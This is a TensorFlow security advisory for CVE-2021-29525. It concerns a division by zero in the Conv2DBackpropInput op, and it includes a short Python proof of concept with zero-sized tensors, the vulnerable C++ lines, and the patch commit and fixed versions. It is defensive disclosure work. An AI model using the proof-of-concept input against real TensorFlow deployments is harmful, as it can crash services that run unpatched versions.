• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1## TFSA-2021-014: Division by 0 in `Conv2DBackpropInput`
2
3### CVE Number
4CVE-2021-29525
5
6### Impact
7An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropInput`:
8
9```python
10import tensorflow as tf
11
12input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32)
13filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32)
14out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32)
15
16tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor,
17                               out_backprop=out_backprop, strides=[1, 1, 1, 1],
18                               use_cudnn_on_gpu=True, padding='SAME',
19                               explicit_paddings=[], data_format='NHWC',
20                               dilations=[1, 1, 1, 1])
21```
22
23This is because the
24[implementation](https://github.com/tensorflow/tensorflow/blob/b40060c9f697b044e3107917c797ba052f4506ab/tensorflow/core/kernels/conv_grad_input_ops.h#L625-L655) does a division by a quantity that is controlled by the caller:
25
26```cc
27  const size_t size_A = output_image_size * dims.out_depth;
28  const size_t size_B = filter_total_size * dims.out_depth;
29  const size_t size_C = output_image_size * filter_total_size;
30  const size_t work_unit_size = size_A + size_B + size_C;
31  ...
32  const size_t shard_size =
33      use_parallel_contraction ? 1 :
34      (target_working_set_size + work_unit_size - 1) / work_unit_size;
35```
36
37### Patches
38We have patched the issue in GitHub commit
39[2be2cdf3a123e231b16f766aa0e27d56b4606535](https://github.com/tensorflow/tensorflow/commit/2be2cdf3a123e231b16f766aa0e27d56b4606535).
40
41The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
42commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
432.1.4, as these are also affected and still in supported range.
44
45### For more information
46Please consult [our security
47guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
48more information regarding the security model and how to contact us with issues
49and questions.
50
51### Attribution
52This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
53X-Team.
54